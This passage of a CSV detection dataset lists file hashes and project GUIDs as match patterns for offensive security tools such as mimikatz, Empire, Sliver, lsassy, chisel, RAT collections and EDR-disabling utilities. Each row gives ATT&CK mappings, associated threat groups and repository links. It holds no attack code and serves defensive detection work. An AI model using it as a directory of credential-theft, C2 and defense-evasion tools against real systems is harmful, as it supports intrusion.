Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29274"
"*77d2aa31773df8903d877f30db405b48896581f762b0d70e73e2c1014ea7b378*",".{0,1000}77d2aa31773df8903d877f30db405b48896581f762b0d70e73e2c1014ea7b378.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#filehash","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","29275"
"*77d5859c1973d0e9aa2d28a0d8cc46ecc6678828b35a728d8c4efebf596fe448*",".{0,1000}77d5859c1973d0e9aa2d28a0d8cc46ecc6678828b35a728d8c4efebf596fe448.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29276"
"*77d6df99bd2b655d9f00ac88e6a908a7e3ba23a4f7b181942b9ca3063d7d80ce*",".{0,1000}77d6df99bd2b655d9f00ac88e6a908a7e3ba23a4f7b181942b9ca3063d7d80ce.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29277"
"*77db549ca1d8238056074d8abda0c1715bb69f1c0b85795f1680c20960e6a757*",".{0,1000}77db549ca1d8238056074d8abda0c1715bb69f1c0b85795f1680c20960e6a757.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29278"
"*77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56*",".{0,1000}77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29279"
"*77e168cc5dfb4dd91c2512029eef1d0d4656df72961132bf0ba125fcaa86072f*",".{0,1000}77e168cc5dfb4dd91c2512029eef1d0d4656df72961132bf0ba125fcaa86072f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29280"
"*77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f*",".{0,1000}77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29282"
"*77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169*",".{0,1000}77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","29283"
"*77f72dddfd3e604f689b437c0e813ad2935b0ca7eb93b6b46e344b97105ecf05*",".{0,1000}77f72dddfd3e604f689b437c0e813ad2935b0ca7eb93b6b46e344b97105ecf05.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","29284"
"*77f75c3af77b7963703d621b6bb262309b8100b08e42d5a41ab99b1aa86d2f88*",".{0,1000}77f75c3af77b7963703d621b6bb262309b8100b08e42d5a41ab99b1aa86d2f88.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29285"
"*77F955C3-4910-49EA-9CD4-CBF5AD9C071A*",".{0,1000}77F955C3\-4910\-49EA\-9CD4\-CBF5AD9C071A.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29286"
"*78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6*",".{0,1000}78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29287"
"*7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596*",".{0,1000}7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#filehash","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","29288"
"*780848610f8c2ed5dc266cd51ce1d12f8049f580bba8ad403296dd93fbc22256*",".{0,1000}780848610f8c2ed5dc266cd51ce1d12f8049f580bba8ad403296dd93fbc22256.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29289"
"*780af7e91e49cdbbc34d44021232c4bb5df42b1584dd35b13a35c8cb670d2c0e*",".{0,1000}780af7e91e49cdbbc34d44021232c4bb5df42b1584dd35b13a35c8cb670d2c0e.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","29291"
"*780bc4923a0f141eccf843b710cedc117075b51562bce79289fbd43b8335a0e9*",".{0,1000}780bc4923a0f141eccf843b710cedc117075b51562bce79289fbd43b8335a0e9.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","29292"
"*780d27ade8e534dc6affd96eeeea3e5ca9bf3e8fc3cc3257597b90f855dd583c*",".{0,1000}780d27ade8e534dc6affd96eeeea3e5ca9bf3e8fc3cc3257597b90f855dd583c.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","29293"
"*78177028fe6c048b40b90f696adfdcbcbda0a7c9f678125bbead5b4f116098fc*",".{0,1000}78177028fe6c048b40b90f696adfdcbcbda0a7c9f678125bbead5b4f116098fc.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","29294"
"*781a54a1bb3fb0960ce374f79a50ba0870e824a5b2432ee8cb2de3b5b8883128*",".{0,1000}781a54a1bb3fb0960ce374f79a50ba0870e824a5b2432ee8cb2de3b5b8883128.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#filehash","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","29295"
"*7820e9465a468401f2ddd41df2e84c2f8b00a4e178a0b9d3cd963824fdcfd31f*",".{0,1000}7820e9465a468401f2ddd41df2e84c2f8b00a4e178a0b9d3cd963824fdcfd31f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29296"
"*7821bc03a533800e3e0ce647b2901934e6bf214209c95262e672f1f04ed1a08c*",".{0,1000}7821bc03a533800e3e0ce647b2901934e6bf214209c95262e672f1f04ed1a08c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29297"
"*782420290c7e89565408d3bc60a468e280014e1e37fde06034712defd95dedfd*",".{0,1000}782420290c7e89565408d3bc60a468e280014e1e37fde06034712defd95dedfd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29298"
"*782811dcb3f37789df2dc8c60c65b59ac7845b0ba57d79f18d178c0a4cc73aaf*",".{0,1000}782811dcb3f37789df2dc8c60c65b59ac7845b0ba57d79f18d178c0a4cc73aaf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29299"
"*7828de08232d4013f86d4a83d0ab31a9d78c7b9d57e7d68c24fd90bb71e09f02*",".{0,1000}7828de08232d4013f86d4a83d0ab31a9d78c7b9d57e7d68c24fd90bb71e09f02.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29300"
"*782ceb859eaa767d4e24ae709d7ab3c0dea3b450c788e04fb2ce4c085e9e8a91*",".{0,1000}782ceb859eaa767d4e24ae709d7ab3c0dea3b450c788e04fb2ce4c085e9e8a91.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","29301"
"*7835f04904af502bf964096d69451a6151ceb600fa2360bb70396054516847e7*",".{0,1000}7835f04904af502bf964096d69451a6151ceb600fa2360bb70396054516847e7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29303"
"*783c942169fb6fe2dd984470a470440dd10a1aec09a153759e8d78a95096a8e6*",".{0,1000}783c942169fb6fe2dd984470a470440dd10a1aec09a153759e8d78a95096a8e6.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#filehash","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","29305"
"*78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec*",".{0,1000}78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29307"
"*784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e*",".{0,1000}784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29308"
"*784adbcf1820556ae22793a98e8bc802017598d4ee00a63c2c5a735b744009f6*",".{0,1000}784adbcf1820556ae22793a98e8bc802017598d4ee00a63c2c5a735b744009f6.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","29309"
"*784F8029-4D72-4363-9638-5A8D11545494*",".{0,1000}784F8029\-4D72\-4363\-9638\-5A8D11545494.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","#GUIDproject","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","29311"
"*784f96fcd55e4e19e9178acc0b38fbb1536821a8ffdbf02a1606eec74ef82d4f*",".{0,1000}784f96fcd55e4e19e9178acc0b38fbb1536821a8ffdbf02a1606eec74ef82d4f.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","29312"
"*785103e26500da6cc70ffbd7aa5edb74b8c8a3d38741fe34bf484108e7a76f46*",".{0,1000}785103e26500da6cc70ffbd7aa5edb74b8c8a3d38741fe34bf484108e7a76f46.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29313"
"*7863d0f2b0c532b9f36b62550833049f402a1267b64433b6d5c7e007252ce83f*",".{0,1000}7863d0f2b0c532b9f36b62550833049f402a1267b64433b6d5c7e007252ce83f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29314"
"*7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388*",".{0,1000}7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","29315"
"*78656dcbb5b795a7e71947b0f45fc054ced091ee2b62a41562879750ff111200*",".{0,1000}78656dcbb5b795a7e71947b0f45fc054ced091ee2b62a41562879750ff111200.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","29316"
"*786585f4258b3ba87767b73a7cb8654ba31967264a82c8e60cbc905f81efa24d*",".{0,1000}786585f4258b3ba87767b73a7cb8654ba31967264a82c8e60cbc905f81efa24d.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29317"
"*7867f83c0599dc48a1a709b0a0bbfe4f4af72f8cdf14bbae58fdf5e461f1ca26*",".{0,1000}7867f83c0599dc48a1a709b0a0bbfe4f4af72f8cdf14bbae58fdf5e461f1ca26.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29318"
"*7870be97747b352f74adf2c6dc96d647240b984517155f46565ce00307df0248*",".{0,1000}7870be97747b352f74adf2c6dc96d647240b984517155f46565ce00307df0248.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29321"
"*78733969f8a27a92e4af2c9c835b256fdce1f5f521a5a248e16dafb385a68e6e*",".{0,1000}78733969f8a27a92e4af2c9c835b256fdce1f5f521a5a248e16dafb385a68e6e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29322"
"*787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0*",".{0,1000}787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29323"
"*7876ba8fb2f4a1e4802f1f2c1030b9bc708f3981264fea33e261be7e05966169*",".{0,1000}7876ba8fb2f4a1e4802f1f2c1030b9bc708f3981264fea33e261be7e05966169.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","#filehash","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","29324"
"*78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547*",".{0,1000}78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29325"
"*7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07*",".{0,1000}7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29326"
"*7898617D-08D2-4297-ADFE-5EDD5C1B828B*",".{0,1000}7898617D\-08D2\-4297\-ADFE\-5EDD5C1B828B.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#GUIDproject","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","29327"
"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*",".{0,1000}789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","29329"
"*78a098cf3b91a354d6425bb5c08af4a0cc137a71bec4ad44707d864e263a4384*",".{0,1000}78a098cf3b91a354d6425bb5c08af4a0cc137a71bec4ad44707d864e263a4384.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#filehash","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","29330"
